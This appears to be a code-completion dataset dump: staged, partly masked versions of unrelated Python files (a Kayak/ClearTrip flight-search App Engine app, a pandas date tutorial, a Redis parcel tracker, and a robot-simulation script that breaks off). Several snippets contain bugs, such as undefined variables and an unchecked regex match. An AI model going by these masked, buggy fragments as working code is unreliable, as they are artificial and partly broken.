{'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass MainHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass CronHandler(webapp.RequestHandler):\n\n def get(self):\n cron = Cron()\n cron.init_scheduler()\n cron.run()\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-5": "import os\nimport re\nimport logging\nimport time\nfrom string import replace\nfrom settings import *\nimport wsgiref.handlers\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom modules.xml2dict import *\nfrom modules import kayak\nfrom modules.messaging import *\nfrom modules.cron import *\n\nkayak = kayak.Kayak(\n SETTINGS['Kayak']['API_TOKEN'],\n SETTINGS['Kayak']['BASE_URL'],\n)\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n pass\n '''\n messages = twitter.statuses.mentions()\n mydict = {'messages':{}}\n counter = 0\n for message in messages:\n mydict['messages'][('%s' % counter)] = message\n counter += 1\n \n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, mydict))\n '''\n\nclass CronHandler(webapp.RequestHandler):\n def get(self):\n \n cron = Cron()\n cron.init_scheduler()\n cron.run()\n \n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n \n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n \n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n \n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n \n kayak.session_id = session_id\n kayak.headers = { 'Cookie' : kayak_session.headers['set-cookie'] }\n \n kayak_search = kayak.post_search(\n messaging.mentions['from'],\n messaging.mentions['to'],\n messaging.mentions['departure']['day'] + '/' + messaging.mentions['departure']['month'] + '/' + messaging.mentions['departure']['year'],\n messaging.mentions['retour']['day'] + '/' + messaging.mentions['retour']['month'] + '/' + messaging.mentions['retour']['year']\n )\n logging.debug(kayak_search.content)\n \n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content)\n search_id = search_id.group(1)\n \n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n\n result_set = ''\n\n more_pending = re.search('<morepending>true</morepending>', kayak_results.content)\n \n if more_pending.group(0) is not None:\n more_pending = True\n \n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n \n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\nclass KayakHandler(webapp.RequestHandler):\n \n def get(self):\n file = open('kayak-result.xml','r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n '''\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n '''\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n \nclass ClearTripHandler(webapp.RequestHandler):\n \n def get(self):\n file = open('result.xml','r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n '''\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n '''\n path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n \n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n \n self.response.out.write(messaging.mentions)\n \n \n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n application = webapp.WSGIApplication([\n ('/', MainHandler),\n ('/kayak', KayakHandler),\n ('/cleartrip', ClearTripHandler),\n ('/cron', CronHandler),\n ('/api/kayak', KayakApi),\n ('/messaging', MessageParser),\n ], debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n\n\n",
"step-ids": [
5,
8,
9,
11,
17
]
}
|
[
5,
8,
9,
11,
17
] |
#%%
### 날짜 데이터 분리
# 연-월-일 날짜 데이터에서 일부 분리 추출
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
# 문자열인 날짜 데이터를 판다스 Timestamp로 변환
df['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가
print(df.head())
print()
# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기
# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장
df['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장
print(df.head())
print('------------------')
# 원하는 열을 행 인덱스로 지정
df.set_index('Date_m', inplace=True)
print(df.head())
# %%
|
normal
|
{
"blob_id": "d89e1d653c6db322feb6edba93cbfc622bf47aa2",
"index": 2781,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\nprint()\n<mask token>\nprint(df.head())\nprint('------------------')\n<mask token>\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-3": "<mask token>\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-4": "import pandas as pd\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-5": "#%%\n\n### 날짜 데이터 분리\n# 연-월-일 날짜 데이터에서 일부 분리 추출\n\nimport pandas as pd\n\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\n\n# 문자열인 날짜 데이터를 판다스 Timestamp로 변환\ndf['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가\nprint(df.head())\nprint()\n\n# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\n\n# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기\n# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출 \ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장\nprint(df.head())\nprint('------------------')\n\n# 원하는 열을 행 인덱스로 지정\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
<|reserved_special_token_0|>
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
def ler_carta(self):
carta = self.user_dict.get(self.pacote)
carta = carta.decode(encoding='UTF-8')
return carta
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
import os
import redis
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
def ler_carta(self):
carta = self.user_dict.get(self.pacote)
carta = carta.decode(encoding='UTF-8')
return carta
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
import os
import redis
class Carteiro():
if os.environ.get("REDIS_URL") != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get("REDIS_URL"))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get("REDIS_URL") != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
def ler_carta(self):
carta = self.user_dict.get(self.pacote)
carta = carta.decode(encoding='UTF-8')
return carta
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
|
flexible
|
{
"blob_id": "dd95d14f35b6a92b3363d99a616678da18733a61",
"index": 7839,
"step-1": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n <mask token>\n <mask token>\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-2": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n <mask token>\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-3": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n\n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-4": "import os\nimport redis\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n\n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-5": "import os\nimport redis\n\nclass Carteiro():\n\n if os.environ.get(\"REDIS_URL\") != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get(\"REDIS_URL\"))\n else:\n redis_pool = ''\n \n def __init__(self, id, pacote):\n if os.environ.get(\"REDIS_URL\") != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n \n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n \n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
plot_2d(results_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'$log_{10}(Energy)$[J]'])
plt.figure('Ratio')
plot_2d(ratio_vel_en, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Ratio V/E $[s\\cdot kg^{-1}\\cdot m^{-1}]$'])
t = time.time()
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def exercise_9c(world, timestep, reset):
"""Exercise 9c"""
n_joints = 10
Rhead = 0.44
Rtail = 0.23
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1)]
for simulation_i, parameters in enumerate(parameter_set):
reset.reset()
run_simulation(world, parameters, timestep, int(1000 * parameters.
simulation_duration / timestep), logs=
'./logs/9c/simulation_{}.npz'.format(simulation_i))
plot_9c(parameter_set)
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
